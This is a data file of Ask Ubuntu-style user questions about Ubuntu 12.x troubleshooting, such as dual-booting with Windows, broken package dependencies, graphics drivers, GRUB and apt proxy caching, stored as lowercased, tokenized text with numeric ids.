243836	where did this `` nonexistant '' directory come from and what should i do with it ?	it 's owned by 'nobody ' and i 'm wondering if it could explain difficulty i 'm having in shutting down . drwxr-xr-x 2 root root 4.0k nov 28 09:59 bin drwxr-xr-x 4 root root 4.0k jan 16 08:28 boot drwxr-xr-x 2 root root 4.0k mar 31 2012 cdrom drwxr-xr-x 15 root root 4.4k jan 16 13:23 dev drwxr-xr-x 175 root root 12k jan 16 13:24 etc drwxr-xr-x 6 root root 4.0k may 22 2012 home lrwxrwxrwx 1 root root 37 jan 13 12:34 initrd.img - > /boot/initrd.img-3.2.0-35-generic-pae lrwxrwxrwx 1 root root 37 oct 15 19:01 initrd.img.old - > /boot/initrd.img-3.2.0-32-generic-pae drwxr-xr-x 25 root root 4.0k jan 16 08:25 lib drwx -- -- -- 2 root root 16k mar 31 2012 lost+found drwxr-xr-x 6 root root 4.0k jan 16 13:17 media drwxr-xr-x 2 root root 4.0k jan 27 2012 mnt drwxr-xr-x 2 nobody root 4.0k oct 22 17:53 nonexistent drwxr-xr-x 34 root root 4.0k nov 5 19:09 opt dr-xr-xr-x 222 root root 0 jan 16 13:21 proc drwx -- -- -- 20 root root 4.0k jan 14 23:26 root drwxr-xr-x 28 root root 980 jan 16 13:22 run drwxr-xr-x 2 root root 12k jan 15 18:42 sbin drwxr-xr-x 2 root root 4.0k mar 5 2012 selinux drwxr-xr-x 2 root root 4.0k mar 28 2012 srv drwxr-xr-x 13 root root 0 jan 16 13:21 sys drwxrwxrwt 13 root root 4.0k jan 16 13:33 tmp drwxr-xr-x 12 root root 4.0k oct 26 22:36 usr drwxr-xr-x 14 root root 4.0k jan 16 13:21 var lrwxrwxrwx 1 root root 33 jan 13 12:34 vmlinuz - > boot/vmlinuz-3.2.0-35-generic-pae lrwxrwxrwx 1 root root 33 oct 15 19:01 vmlinuz.old - > boot/vmlinuz-3.2.0-32-generic-pae as requested jarlath @ jarlath-ep35-ds3 : ~ $ ls -la /nonexistent/ total 8 drwxr-xr-x 2 nobody root 4096 oct 22 17:53 . drwxr-xr-x 25 root root 4096 jan 13 12:34 ..
243840	ubuntu 12.10 and windows xp	i installed ubuntu 12.10 on my son 's pc . then i bought a copy of windows xp and tried to install it , replacing one os for another . i have followed the advice given in many other similar questions of this site to create the correct type of partition to install xp along side ubuntu . every time i tried installing xp , it gave me the blue-screen and indicated that the hard drive was corrupted . the upshot is i now require to grub rescue to get the pc started up as it wo n't boot , or boot up from the original installation usb . is there anyone able to help me with the process of getting the pc up and running again ubuntu and/or be able to install xp ?
243845	should i be afraid to install nvidia driver updates ?	im running ubuntu 12.04 lts using nvidia geforce gt630m i already installed bumblebee and it works , but after like 2 weeks using it , i got updates like this : should i install the updates ? im afraid to install it because i recently had bad experience with nvidia driver in ubuntu ( like missing unity , resolution become small ) and it took me to uninstalling ubuntu to fix that.. since i already install all the application i need , i dont want to break my system again ( which will cause me to reinstall ubuntu to refix system and reinstall all application ) .
243847	is it possible to restore ms word 2010 file by using a .lnk file ?	i have ubuntu 12.10 , and use ms office 2010 to write documents . i have been writing and saving a file but when i went to open it today to was nowhere to be seen . not in the the rubbish bin and when in word it is listed in recent documents but ca n't be found . after doing a full system search , i have found 71 .lnk files for the document . therefore does anyone no if it is possible to restore the file ? or can i use the .lnk files to do this ? or are there any other ways to search the hard dive for the file , which i guess i have saved 71 times !
243849	vista wo n't boot . i do n't have the installation disk with me , can i install ubuntu to access my files even though vista wo n't boot ?	i have managed to access my files with the demo but i 'd like the full version . if i install ubuntu while my vista os is n't working will i lose my files ?
243865	how to go back to gimp 2.6 ?	on an old pc , i have lubuntu 12.10. during gimp installation , the newest version was installed ( ver . 2.8 ) , but i think its a little heavy for an old machine like mine with a poor intel celeron cpu ( ram 1gb , vga 128 ) how can i go back to gimp 2.6 ?
243867	firefox , touchpad middle-button , open in new tab , lenovo t60	i use firefox 18.0 with xubuntu 12.04 on a lenovo laptop t60 . i like to use the middle button above the touchpad to do a middle-click on a link to open that page in a new tab . it works with the mouse and it worked with my former laptop , a thinkpad t41 with very similar touchpad . i can open a link in a new tab too if i hit the left and right button meanwhile , but that 's not comfortable . i find this with synclient : synclient -l parameter settings : leftedge = 1752 rightedge = 5192 topedge = 1620 bottomedge = 4236 fingerlow = 25 fingerhigh = 30 fingerpress = 256 maxtaptime = 180 maxtapmove = 221 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 fasttaps = 0 emulatemidbuttontime = 75 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 100 horizscrolldelta = 100 vertedgescroll = 1 horizedgescroll = 1 cornercoasting = 0 verttwofingerscroll = 0 horiztwofingerscroll = 0 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0398089 trackstickspeed = 40 edgemotionminz = 30 edgemotionmaxz = 160 edgemotionminspeed = 1 edgemotionmaxspeed = 401 edgemotionusealways = 0 touchpadoff = 0 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 1 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 25 verthysteresis = 25 clickpad = 0 i guess ltrb stands for left , top , right , bottom - mt for middle-top is missing . btw : middle click for pasting works . i 'm curious how that fits together .
243877	kubuntu or ubuntu with kde ? what 's the difference ?	i 've been an ubuntu user for some time but now looking at moving to a kde desktop and thinking about installing kubuntu on my newly rebuilt laptop , however i have an ubuntu one account and use it a great deal . therefore am i better off installing ubuntu ( 12.10 ) and simply adding the kde desktop afterwards ?
243878	visual studio on ubuntu	i was told visual studio would not work for ubuntu . however , after searching to see if i can get notepad++ to work on a new install of ubuntu 12.04 i found something called wine . after some more reading i am under the impression wine is a windows installer for ubuntu ? can someone verify this ? i am also to presume that i could install visual studio on ubuntu via wine ? reference
243882	what 's the best approach in migrating currently c # and vb.net ( windows ) developed applications ?	i would like to start to `` translate '' my windows applications to ubuntu users . these are mainly crms or crm related programs written in vb.net and c # . what would be the best language and ide for these kind of projects in ubuntu ? this is the first time in my life when googling confused me instead of helping with the decision .
243886	netbook : lubuntu or custom ubuntu	i just bought a netbook with this conf : intel atom n2600 / 1.6 ghz / 1 mo cache 1 go ddr3 intel gma 3600 it 's provided with windows 7 starter . i 'd like to have a system that can run for as long as possible and that do n't lagg . i 'm quite used to linux , and i do n't care about eye-candy windows manager . i will use my computer for : coding ( java/c++/sql ) web browsing ( +flash if possible ) text editing i 've saw lubuntu is quite good and hs quite low system requirement , but is also new and some stuff may not work good . what is the best option for me , intall ubuntu , use it with xfce , and find some ways to make it faster or to use directly lubuntu , or something else ?
243892	desktop icon for network	very new to ubuntu 12.04 which i just installed on a laptop but i was wondering how i can get the folder in browse network to appear on my desktop and dock ? allowing me to be able to click on the folder and the network would be displayed ?
243893	words and hyperlinks only displayed on sites like facebook and youtube	well , i installed the ubuntu 12.10 in a netbook ( use wi-fi internet ) and now , some website dont load correctly , like facebook page , youtube or askubuntu page . i installed adobeflash player plugin , openjdk-7-jdk and icedtea6-plugin to browser and nothing happened . i installed the chromium too and same thing happened . when i try to charge a facebook or youtube page , just show some words and hyperlinks without figures or videos ( the cookies settings is okay ) , but when a try another site like hotmail , work normally .
243904	how to fix `` package system is broken '' after upgrading to 12.04 ?	i can no longer remove or install any software or perform any updates . i got this error message after i upgraded to 12.04 : the package system is broken check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f the following packages have unmet dependencies : libpam-winbind : depends : libwbclient0 ( = 2:3.6.3-2ubuntu2.1 ) but 2:3.6.3-2ubuntu2.3 is installed depends : winbind ( = 2:3.6.3-2ubuntu2.1 ) but 2:3.6.3-2ubuntu2.1 is installed depends : samba-common ( = 2:3.6.3-2ubuntu2.1 ) but 2:3.6.3-2ubuntu2.3 is installed winbind : depends : libwbclient0 ( = 2:3.6.3-2ubuntu2.1 ) but 2:3.6.3-2ubuntu2.3 is installed depends : samba-common ( = 2:3.6.3-2ubuntu2.1 ) but 2:3.6.3-2ubuntu2.3 is installed i 'm a new user so i have no idea what to do with this error message .
243910	i want to uninstall ubuntu	i have ubuntu 12.04 lts on my windows 7 laptop and i am trying to uninstall it but when i insert the ubuntu disk i can not find any uninstall options .
243913	focussed working , is there an app for that ?	so this isnt like a technical question , just some advice . this is my issue : a few years ago i had a medical problem but i 'll spare you the details . one of the results is a lack of concentration and motivation . how it works is that i can get a burst of enthusiasm and work away at a project for hours on end , then it 's like i hit a large wall ( literally from one moment to the next , not gradual ) where i ca n't continue and the project gets abandoned . now motivation is something you ca n't really fix with an app . but , i have seen that there are apps that allow you to write without distractions , but i do programming ( currently html , php and css but also a lot of python ) . is there an app that either allows me to kinda make previous code typed not seem so daunting , or perhaps an app that can make me focus solely on the task at hand ? i know it 's a bit of an odd question , but any ideas are very welcomed , even if it 's just advice . thanks in advance
243924	want to uninstall ubuntu but can not boot into ubuntu , only windows	i installed ubuntu onto an old work laptop a while ago and of course i love it , however i will have to hand this laptop back into work at sometime as it has become pretty old now , so i want to uninstall ubuntu before i do . problem is work pushed out an update to the machine which encrypts all partitions , since then although ubuntu is still shown in the boot loader , it wo n't boot as i assume it has been encrypted and this is blocking it . so is there anyway of removing ubuntu from the machine without needing to actually boot into it ? as all the tutorials i have seen ask you to boot into ubuntu . the laptop is running win xp 32bit sp3 as its original os and ubuntu 12.04
243934	wubi installation sticking at almost finished copying files	i am using ubuntu windows installer to install ubuntu a safer way ... first time it installed correctly but due to some issues i uninstalled ubuntu.. but now it is always sticking at almost finished copying files .. the progress bar is always at 70 percent ... is there any way to fix this ?
243937	dual boot ubuntu 12.04/windows8 grub	i installed ubuntu on 12.04 on my samsung laptop alongside windows 8 . to install ubuntu i disabled the bios security and enables csm os . the installation went fine and ubuntu works great . the problem is that when from the grub menu i select windows 8 or windows 8 recovery it does n't load anything . if i in the bios i enable the secure os option than i do n't get the grub menu , but windows 8 detect some error and after a while loads fine . disabling again the secure os option in the bios , i get the grub menu and ubuntu works fine . what can i do to fix this and normally dual boot either ubuntu or windows ? thanks a lot in advance , luca
243940	where did my 766 kb in partition go ?	i used fdisk -l and saw this . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x580a1fd4 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 417083391 208438272 7 hpfs/ntfs/exfat /dev/sda3 417095656 1953523711 768214028 f w95 ext 'd ( lba ) /dev/sda5 417095658 1871315459 727109901 7 hpfs/ntfs/exfat partition 5 does not start on physical sector boundary . /dev/sda6 1871316992 1900611583 14647296 83 linux /dev/sda7 1900613632 1908424703 3905536 82 linux swap / solaris /dev/sda8 1908426752 1953523711 22548480 83 linux this show that my logical partition sda5 ends at 1871315459 and sda6 begins at 1871316992 . then where did my 1533 sectors ie 766 kb go ?
243942	how can i prevent web apps from appearing in the launcher ( waste of launcher space ) ?	every time i go to amazon website , an extra launcher icon gets created in my launcher as long as i 'm on the amazon website . how can i prevent this icon from appearing in the launcher ? it 's a waste of space , because i have already a firefox launcher icon , and the amazon icon is nothing else than firefox being on the amazon website . i do n't want web apps to appear in the launcher . it 's enough that they are a shortcut in the dash . so how do i keep them from creating superfluous icons in the launcher ?
243945	will my ubuntu installation be damaged if i upgrade my windows partition ?	bought my laptop in september 2009 . does this mean that uefi with secure boot will not be present ? if that 's the case then there would not be any problems to the linux/ubuntu installations while upgrading to windows 8 right ? what will happen if i upgrade to windows 8 ? what will happen if i install windows 8 alongside ? config : windows 7 + ubuntu 12.10 + backtrack ( latest ) windows 7-32 bit , ubuntu 12.10 - 32 bit , processor t-9550 ( intelâž coreâ˘2 duo processor t9550 ) , 4 gb ram , 1tb hardisk , not gpt , mbr partition i do not want to lose my ubuntu/ linux distros once i upgrade to/ install windows 8 .
243950	how do i rerun ubuntu software selection after installation is complete	i installed ubuntu from the minimal cd ( mini.iso ) . during the install , i was presented this feature ( `` software selection '' ) : how do i launch it after install ?
243955	no launcher and menus in ubuntu 12.10 after changing from nvidia to intel graphics	i have removed my discrete nvidia gpu from my pc and i was planing to use my internal intel hd 2500 instead . but it does not work properly . since then i am missing my unity launcher and the top menu . i have tried to reinstall several stuff and purged the nvidia-driver , but nothing helped so far . if you need further information just mention it . i am glad for every help !
243960	how to empty grub customizer trash ?	i have customized grub using grub customizer ( version : 3.0.2 ) . i have deleted some entries which are now in grub customizer trash . since i have no problem with grub boot loader , so i want to empty grub customizer trash . i have removed grub customizer using synaptic package manager with `` mark for complete removal '' and then installed again . still no change . 27 items remain in grub customizer trash . can i remove them ?
243964	no icons , no taskbar after i login	i installed ubuntu 12.10 last night using the windows installer and when i rebooted it started up , got to the login screen , i typed in my password and hit enter and all i have is my mouse and the wallpaper ... no icons , task bar or anything . i tried restarting and logging in again and still nothing . also the first time it started up it said compiz has closed unexpectedly . any ideas on what to do ? @ jap1968 i had the system log open ... not exactly sure what i should be looking for @ iseth sorry man im a noob . if you cant tell haha . had ubuntu before just actually trying to figure it out this time . i ended up switching to gnome..any ideas how to get unity to work ? im pretty sure it my graphics card , im running it on an older dell . any ideas on how i would be able to get it to work ? thanks for the help . greatly appreciated
243966	media not found message	when are you going to fix the media not found message when trying to mount a diskette . this problem has been going on far too long and i would have thought by now it would have been addressed as there are many complaints about it on different web sites . robert
243968	how can i install ubuntu in such a way that files are readable by both ubuntu and windows ?	i am installing ubuntu alongside windows , choosing the dual-boot option . i do not want to do a wubi installation . i want a full fledged installation . i want to share files between windows and ubuntu . so how can i achieve this ? what steps should i remember while installing ubuntu ? what are the advantages and disadvantages of filesystems like ext4 , ntfs , and btrfs in this situation ? context : i have 320gb hard disk . i have only one c drive . i will be shrinking the c drive and alloting 50gb for ubuntu and installing ubuntu in it .
243973	how can i get ubuntu to work alongside windows 8 ?	i 'm not really good with computers , so i have no idea what 's going on . what i do know is that i absolutely hate windows 8 and in every desperate attempt , from trying to install windows 2000 to trying to install ubuntu , all has failed . i downloaded ubuntu , installed with wubi , and everytime i try to start it it says that a file is missing . i understand this has something to do with my safe boot or whatever , but i have no idea how to turn that off . i thought i turned it off , but ubuntu wo n't start so i probably did it wrong . can someone please give me an idiots guide on making this work because i swear if i have to put up with windows 8 for another day i will throw myself and my laptop out a window .
243981	how do i use google+ in gwibber ?	i know that the gwibber client supports facebook and twitter , but is it possible to use it with google+ ?
243985	using the downloaded upgrade packages from one laptop to another	i have upgraded ubuntu 11.10 ( amd64 ) to 12.04 ( amd64 ) on one of the laptops i have , i have another laptop which is also running 11.10 ( amd64 ) i want to use the packages downloaded on the first laptop on the second laptop so that both have ubuntu 12.04 i checked on first laptop ( now running 12.04 ) downloaded upgrades are residing in /var/cache/apt/archives i have done an sftp for those packages from laptop 1 to laptop 2 . on the laptop 2 i have tried putting those package files into /var/apt/cache/archives and then just firing the upgrade process do-release-upgrade , and unfortunately this does not work and rather than picking the packages from /var/cache/apt/archives it goes to some thing like http : //us.archive.ubuntu.com/ubuntu/ precise/main qemu-utils amd64 1.0+noroms-0ubuntu13 [ 353 kb ] and so on and is downloading things , now what i want to know is how do i make sure do-release-upgrade uses these in my laptop and does not downloads 700 mb of updates because this will take 8-10 hours at my end so i want to utilize the upgrades which were downloaded during the upgrade process on one of the systems . if there is a way in this situation let me know .
243992	how can i fix dependency problems with firefox ?	i ca n't do anything from ubuntu software center or from terminal this is what i get from command line : deus @ comp : ~ $ sudo apt-get autoremove [ sudo ] password for deus : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : firefox-globalmenu : depends : firefox ( = 18.0+build1-0ubuntu0.12.04.3 ) but it is not installed e : unmet dependencies . try using -f. deus @ comp : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : firefox suggested packages : latex-xft-fonts firefox-gnome-support the following new packages will be installed : firefox 0 upgraded , 1 newly installed , 0 to remove and 5 not upgraded . 1 not fully installed or removed . need to get 0 b/23.7 mb of archives . after this operation , 49.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 203826 files and directories currently installed . ) unpacking firefox ( from ... /firefox_18.0+build1-0ubuntu0.12.04.3_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/firefox_18.0+build1-0ubuntu0.12.04.3_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/firefox/plugins ' , which is also in package adobe-flashplugin 11.2.202.261-0precise1 processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/firefox_18.0+build1-0ubuntu0.12.04.3_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) deus @ comp : ~ $ sudo apt-get clean deus @ comp : ~ $ sudo apt-get check reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : firefox-globalmenu : depends : firefox ( = 18.0+build1-0ubuntu0.12.04.3 ) but it is not installed e : unmet dependencies . try using -f. deus @ comp : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : firefox suggested packages : latex-xft-fonts firefox-gnome-support the following new packages will be installed : firefox 0 upgraded , 1 newly installed , 0 to remove and 5 not upgraded . 1 not fully installed or removed . need to get 23.7 mb of archives . after this operation , 49.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //gr.archive.ubuntu.com/ubuntu/ precise-updates/main firefox i386 18.0+build1-0ubuntu0.12.04.3 [ 23.7 mb ] fetched 23.7 mb in 1min 27s ( 271 kb/s ) ( reading database ... 203826 files and directories currently installed . ) unpacking firefox ( from ... /firefox_18.0+build1-0ubuntu0.12.04.3_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/firefox_18.0+build1-0ubuntu0.12.04.3_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/firefox/plugins ' , which is also in package adobe-flashplugin 11.2.202.261-0precise1 processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/firefox_18.0+build1-0ubuntu0.12.04.3_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any ideas of what 's going wrong ? edit/answer to comments @ lucio i did what you said and here is the result . deus @ comp : ~ $ sudo dpkg -r firefox dpkg : warning : there 's no installed package matching firefox deus @ comp : ~ $ ^c deus @ comp : ~ $ apt-get -f install & & sudo apt-get update & & sudo apt-get upgrade e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? deus @ comp : ~ $ sudo apt-get -f install & & sudo apt-get update & & sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : firefox suggested packages : latex-xft-fonts firefox-gnome-support the following new packages will be installed : firefox 0 upgraded , 1 newly installed , 0 to remove and 8 not upgraded . 1 not fully installed or removed . need to get 0 b/23.7 mb of archives . after this operation , 49.7 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 203826 files and directories currently installed . ) unpacking firefox ( from ... /firefox_18.0+build1-0ubuntu0.12.04.3_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/firefox_18.0+build1-0ubuntu0.12.04.3_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/firefox/plugins ' , which is also in package adobe-flashplugin 11.2.202.261-0precise1 no apport report written because maxreports is reached already processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/firefox_18.0+build1-0ubuntu0.12.04.3_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
243993	old laptop for ubuntu home server : powerful enough ?	it 's main use will be : torrents and other downloads storing files ( everything , from jpgs to big isos ) from multiple ubuntu , android and windows systems ( more than 7 ) streaming 1080p video files ( around 2100+ kbps bitrate ) to those devices and a smarttv nothing too crazy , but there 's the hardware : the laptop is an old inspiron 6400 with a core duo ( not 2 , the original ) with 1gb of ram and a 965 chipset . it already runs ubuntu and other apps decently , but its not fast . i have a n router but the laptop has a g card . i guess i could change it , or in any case wire it to the router , although that could be difficult because the router is in a place with little space . besides that i plan to connect 2 1tb 2.5 '' usb hdds to it for storage , but i 'm not sure if it could power a third one , would welcome some input on this . so , can it handle this ?
243999	why do question mark characters appear when changing the permissions of directory ?	i am trying to change permissions of a folder temporarily whose initial permissions are user @ ubuntu : /var/log $ ls -l squid* squid3 : total 4 -rw-r -- -- - 1 proxy proxy 0 jan 16 14:43 access.log -rw-r -- -- - 1 proxy proxy 1359 jan 16 14:43 cache.log ls : can not open directory squid-deb-proxy : permission denied to some thing following user @ ubuntu : /var/log $ sudo chmod -r 644 squid* user @ ubuntu : /var/log $ ls -l squid* squid3 : ls : can not access squid3/cache.log : permission denied ls : can not access squid3/access.log : permission denied total 0 - ? ? ? ? ? ? ? ? ? ? ? ? ? ? access.log - ? ? ? ? ? ? ? ? ? ? ? ? ? ? cache.log squid-deb-proxy : ls : can not access squid-deb-proxy/store.log : permission denied ls : can not access squid-deb-proxy/cache.log : permission denied ls : can not access squid-deb-proxy/access.log : permission denied total 0 - ? ? ? ? ? ? ? ? ? ? ? ? ? ? access.log - ? ? ? ? ? ? ? ? ? ? ? ? ? ? cache.log - ? ? ? ? ? ? ? ? ? ? ? ? ? ? store.log you will notice after the change of permissions there are question marks everywhere . why is this happening ? i basically want to read the access log to see if squid-deb-proxy server is getting requests from client or not .
244004	ubuntu wo n't do 1920x1080	both my monitors ( one over dvi other over hdmi ) have a native resolution of 1920x1080 ( 16:9 ) but the only two options for resolution in the `` display '' section of system settings are 800x600 ( 4:3 ) and 1024x768 ( 4:3 ) . the `` additional drivers '' tab in the `` software sources '' section of system settings tells me i have no drivers running , despite installing nvidia drivers multiple times . i downloaded and installed jockey from the software centre , which told me that i am running the nvidia driver . since closing jockey i am unable to find any trace of it in my system . i ca n't open it in terminal either . when i search `` nvidia '' in the dash , i get `` nvidia x server settings '' and in there as well i have the same resolution options as in `` display '' settings . additional information : with only one monitor , the issue persists . mt driver version is nvidia-current , 304.64 . logging in with `` guest login '' , i have all resolution options available , including 1920x1080 . there is no xorg.conf file in /etc/x11 there is , however : xorg.conf.failsafe . i tried deleting .nvidia-settings-rc from home and this had no effect . i am running 12.10 , both monitors are asus ( main : vh238h second : ve247h ) and my gpu is a gtx660 ti . possibly related : when i do ctrl+alt+f1 i am prompted to login , then the screen fades to black . same issue occurs when i use `` big picture '' mode in steam . what 's strange is that it seems the login screen is at proper resolution , and right after logging in , i get this message :
244008	brightness works with function ( fn ) keys in lubuntu 12.10 but not ubuntu 12.10	i have a toshiba portege r930 laptop and installed lubuntu 12.10 through wubi and then installed the ubuntu-desktop package afterwards . when in lubuntu , pressing fn+f6 and fn+f7 lowers and increases my screen brightness perfectly , however , when logging into ubuntu ( instead of lubuntu ) , the function keys do n't work . ideas ?
244013	can not find windows 7 in grub customizer	once again , i find myself back to the `` anywhere , anything '' forum of ubuntu ... just awesome i say ... any ways , after i installed the grub customizer 3.0. ( 1 ) ? i ran it and i am not seeing windows7 . i installed ubuntu 12.10 , then ran update . 2 . i want windows 7 as my primary boot system . 3 . what are the exact steps for locating my windows 7 , and then how do i place it in the grub ? i dont wan na messa anything up ... .after running fdisk -l , this is what is listed : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe227662f device boot start end blocks id system /dev/sda1 * 2048 3074047 1536000 27 hidden ntfs winre /dev/sda2 3074048 536594431 266760192 7 hpfs/ntfs/exfat /dev/sda3 536594432 599508991 31457280 f w95 ext 'd ( lba ) /dev/sda4 599508992 603703295 2097152 6 fat16 /dev/sda5 536596480 599508991 31456256 7 hpfs/ntfs/exfat so now what is the process ? could you please help ... not shutting ubuntu down till i get it right.. ; )
244016	locking keyboard , mouse and cdrom for baby	i use laptop and need to use keyboard between baby activities ... is there any software for ubuntu that does all these things by pressing just one key ( or predefined combination/password ) ? i tried program lk4b but it does not locks cd and mouse , this is unsufficient for my baby ... also how can i disable power button ?
244021	when closing an application it gets erased from the dash and the panel	can someone please help me here . ive been using ubuntu for a month succesfully installing all that i need and use . everything was ok until today . i can not recall any thing else that i did today but here is my log ... please help me : i have gnome remix ( ubuntu 12.10.1 ) installed teamviewr 8 beta configured apt-fast installed virtualbox 4.2 ( windows xp 64 , usb ext pack , dynamic storage , 200mb ram -- and other dependencies ) today these are the only 3 things i used the terminal for ... when i was done ... i clicked the `` x '' to close the terminal ... and it closed , it got removed from my dash and from the gnome shell ... as if it was uninstalled , but seems by closing the window , it delete also the shortcuts for the program ... . because if i run alt+ctrl+t ... the terminal appears normally ( except for the icon on the dash looks low quality ) to confirm that i was n't seeing things ... i tried closing another program and it did the same thing ( chrome , terminal , skype , files , etc ) ... so in order for me to run a program i have to go to /usr/bin and click run also , when i open the application ... the application does n't appear in the shell neither it lets me save it to the dash as a favorite . please help me get this back to normal ... i can give you all the info that you need me to give you ...
244022	why my x server wo n't start as a regular user and it starts as guest ?	it wo n't start x server automatically as a regular user but instead shows logon screen . when i enter my password it flashes for a second and it 's back to logon screen again . then i tried to log in as guest user and it all went well . how can i fix this . please help . to answer guntbert 's question : sorry but i do n't know how to copy ls -la output here . but i think it has something to do with .xauthotiry beacuase it started poping up this error in terminal `` xauth : timeout in locking authority file '' .
244023	how can i unzip files with `` weird '' extensions in ubuntu ?	how can i unzip such files in ubuntu ? i have a list of files end with those extensions filename.tar.gzaa filename.tar.gzab filename.tar.gzac filename.tar.gzad filename.tar.gzae filename.tar.gzaf they have the same 'filename ' with different suffix in extension . and gzaa , to gzae has the same file size 1.1g and gzaf has a small file size . i think all these files are 1 big zip file . how can i unzip them ?
244025	squid-deb-proxy on client side unable to get packages from the server	i am having 2 laptops on one of them i did a do-release-upgrade and it took near about 10 hours to upgrade to 12.04 now i want to upgrade second laptop also so i used following thread best way to cache apt downloads on a lan ? i installed on the laptop ( which was upgraded to 12.04 to be used as caching server so that packages are not downloaded again ) sudo apt-get install squid-deb-proxy avahi-utils started the service sudo start squid-deb-proxy and cp /var/cache/apt/archives/* /var/cache/squid-deb-proxy/ on the client i installed sudo apt-get install squid-deb-proxy-client now on the client i do a sudo do-release-upgrade but it fails to get any kind of upgrade from the deb-proxy-server and rather connects to internet and this is taking 8-10 hours of time for upgrade process . this is verified by the logs on server which mention 1358365800.075 337 192.168.1.3 tcp_miss/304 282 get http : //extras.ubuntu.com/ubuntu/dists/precise/main/binary-i386/packages.bz2 - direct/91.189.88.33 - 1358365800.119 338 192.168.1.3 tcp_miss/304 360 get http : //us.archive.ubuntu.com/ubuntu/dists/precise/multiverse/source/sources.bz2 - direct/91.189.91.15 - tcp_miss which should be rather tcp_hit so the squid-deb-proxy server is not working properly.here what should i do ?
244033	how can i theme the pidgin conversation window ?	i have been looking for a way to theme the pidgin conversation window to match my ubuntu ( 12.10 ) theme . i have tracked it down to the gtkrc-2.0 ( gtkrc-3.0 ? ) file and now know that if a customized file is placed in the .purple directory , the default theme will be overridden . this would work if i could find the pidgin gtk widget names for the conversation window . my ultimate goal would be to add the theme styles to my current theme ( ambiance-dark ) along with the widget name calls so that i would only have to backup a single directory for my theme . question : does anyone have the widget names for pidgin readily available ? i know of 2 that possibly pertain to the conversation window : *pidgin_conv_entry *pidgin_conv_imhtml ... but i really do n't know what these affect . please feel free to edit my post to help clarify/simplify . i am somewhat new to linux and ubuntu . thanks in advance .
244034	is it possible to install ubuntu onto a computer where no other operating system exists ?	my computer is a toshiba satellite 7675d-s7104 model , and it has no operating system on it . is it possible to just boot ubuntu from a flash drive ?
244035	how come all my window buttons are right aligned , but chrome buttons are on the left ?	i am wondering why chrome close/maximize buttons are aligned to the left while all the buttons are aligned to the right . the truth is that the chrome buttons are right aligned too when in the chrome settings i tick `` use system title bar and borders '' . but since i dont want the borders , i unticked this option and the buttons got aligned to the other ( left-hand ) side . does anyone know why this is ? by the way , i am using cinnamon interface on ubuntu 12.04 .
244042	12.10 hangs on splash	this is driving me crackers , and means i am currently having to work on windows , which is just horrible compared to my familiar ubuntu . after the last kernel update ubuntu 12.10 will not boot . i get to the splash screen and it hangs . i have used grub to try older kernels , and i get either the same , or a frozen blank screen . recovery mode has no effect , except sometimes i get to tty , but can not do anything from there . i am using dell n5110 , dual booting with windows 7 . suspect it might have something to do with nvidia or optimus , which seem to be usually the cause of ubuntu problems on this machine . utterly stuck . have spent weeks trawling through similar questions on this site , but : i am not booting from live cd or usb ; i can not get to the login page ; lightdm from tty gets me a frozen blank page . can anyone help me ?
